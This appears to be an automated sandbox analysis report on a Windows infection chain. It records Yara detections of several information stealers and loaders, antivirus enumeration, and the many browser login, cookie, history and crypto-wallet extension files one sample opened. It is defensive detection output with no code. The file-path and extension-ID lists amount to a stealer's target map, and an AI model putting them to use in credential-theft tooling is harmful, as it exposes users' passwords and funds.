Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.1w5RpHuliE.exe.ed0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.skotes.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.skotes.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2059542271.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2099837045.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2086462777.0000000004880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2125257135.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2084996675.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2127312941.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2525381916.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3398024805.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Yara detected GCleaner

Source: Yara match	File source: 27.2.14b550e5e3.exe.defc000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.6761aae677.exe.ead8000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.14b550e5e3.exe.df28000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.6761aae677.exe.ea80000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.6761aae677.exe.eaac000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.14b550e5e3.exe.df54000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.14b550e5e3.exe.df80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.14b550e5e3.exe.dfac000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.3192511267.000000000DD5A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3197107411.000000000DF80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3393436751.000000000EAAC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3197107411.000000000DFAC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3393436751.000000000EA80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3197107411.000000000DF28000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3197107411.000000000DF54000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3344956274.000000000E844000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3393436751.000000000EAD8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3197107411.000000000DEFC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.3397348773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: cbf2b6294a.exe PID: 6340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KbSwZup.exe PID: 6408, type: MEMORYSTR
Source: Yara match	File source: 13.2.b7b5e2e140.exe.a770000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.b7b5e2e140.exe.a70a000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.b7b5e2e140.exe.a770000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.d755f09e83.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.xkV9ZML.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.KbSwZup.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.b7b5e2e140.exe.a7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.b7b5e2e140.exe.a7c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.b7b5e2e140.exe.a770000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.b7b5e2e140.exe.a7c0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.d755f09e83.exe.aeb000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.xkV9ZML.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.4dfe6dfd76.exe.3e39550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.d755f09e83.exe.aeb000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.b7b5e2e140.exe.a7c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.4dfe6dfd76.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.d755f09e83.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.b7b5e2e140.exe.a70a000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.b7b5e2e140.exe.a770000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.xkV9ZML.exe.3919550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.cbf2b6294a.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.4dfe6dfd76.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.b4fe2af6b4.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3110324959.000000000A770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2751476788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2793676749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3109758340.000000000A70A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3102604374.0000000000581000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3110324959.000000000A7C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.3068524352.000000000A7C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2792713729.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3118521479.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3400586669.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.3257227799.0000000000D61000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2748577375.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.3068524352.000000000A770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2875221579.0000000000521000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: xkV9ZML.exe PID: 6352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4dfe6dfd76.exe PID: 6252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: b4fe2af6b4.exe PID: 3608, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 14.2.4dfe6dfd76.exe.3e39550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.4dfe6dfd76.exe.3e39550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.4dfe6dfd76.exe.950000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.2749975380.0000000000952000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2792713729.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 31.2.ViGgA8C.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3404364747.0000000000E12000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3438808735.0000000005324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.3230226352.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ViGgA8C.exe PID: 6044, type: MEMORYSTR

Yara detected SmokeLoader

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1078003001\PqodvBZ.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\PqodvBZ[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match	File source: 00000026.00000002.3401015940.0000000000401000.00000040.00000001.01000000.0000001F.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bjkm5hE.exe PID: 5468, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: xkV9ZML.exe, 0000000A.00000002.2754421644.000000000144B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: xkV9ZML.exe, 0000000A.00000002.2754421644.000000000144B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: xkV9ZML.exe, 0000000A.00000002.2754691030.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitA
Source: xkV9ZML.exe, 0000000A.00000002.2754421644.000000000144B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: cbf2b6294a.exe, 00000019.00000003.3060883563.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: xkV9ZML.exe, 0000000A.00000002.2754691030.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfoofk\|;I
Source: xkV9ZML.exe, 0000000A.00000002.2754421644.000000000144B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: cbf2b6294a.exe, 00000019.00000003.3049989282.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 4dfe6dfd76.exe, 0000000E.00000000.2749975380.0000000000952000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
